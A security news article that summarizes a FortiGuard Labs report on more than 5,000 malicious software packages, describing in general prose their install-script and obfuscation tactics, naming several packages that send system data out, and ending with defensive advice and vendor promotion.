Hackers Compromise Windows Systems Using 5000+ Malicious Packages

A recent analysis by FortiGuard Labs has revealed a significant increase in malicious software packages, with over 5,000 identified since November 2024.

These packages employ sophisticated techniques to evade detection and exploit system vulnerabilities, posing a substantial threat to Windows systems and other software environments.

The tactics used by attackers include low-file-count packages, suspicious install scripts, and the absence of repository URLs, which together make it challenging for traditional security measures to detect these threats.

Malicious Software Packages on the Rise

The low-file-count packages, totaling 1,082, often contain minimal code designed to execute harmful actions undetected.

These packages may use command overwrites, obfuscation techniques like base64 encoding, and suspicious behavior flagged by machine learning systems.

Additionally, 1,052 packages embed suspicious install scripts that silently deploy malicious code during installation, bypassing security checks.

According to FortiGuard Labs Report, these scripts can modify the standard installation process to execute harmful actions without the user’s knowledge, such as data exfiltration via HTTP POST requests or suspicious API calls.

Emerging Threats and Attack Cases

Among the highlighted attack cases, malicious Python packages like AffineQuant-99.6 and amzn-aws-glue-ml-libs-python-6.1.5 exploit setup files to collect system information, including MAC addresses and hostnames, and send this data to remote servers controlled by attackers.

These attacks underscore the risk developers face when installing packages from untrusted sources, potentially leading to stolen credentials and further attacks.

Another notable case involves a malicious Node.js script that secretly collects sensitive information from a victim’s machine and sends it to an external server via a Discord webhook.

This script retrieves internal and external IP addresses, system details, and user information, making it highly invasive and enabling attackers to track the victim’s machine for further exploitation.

To protect against these emerging threats, it is crucial for organizations and individuals to stay informed about the latest threats and implement proactive defense measures.

This includes regular system updates, advanced threat detection tools, and user education on identifying suspicious activity.

Fortinet’s FortiGuard AntiVirus service detects and protects against these malicious files, while the FortiDevSec SCA scanner identifies and prevents malicious dependencies from being introduced into projects.

By adopting robust security strategies, users can mitigate the risks associated with these malicious packages and safeguard their systems from potential attacks.

Are you from SOC/DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free.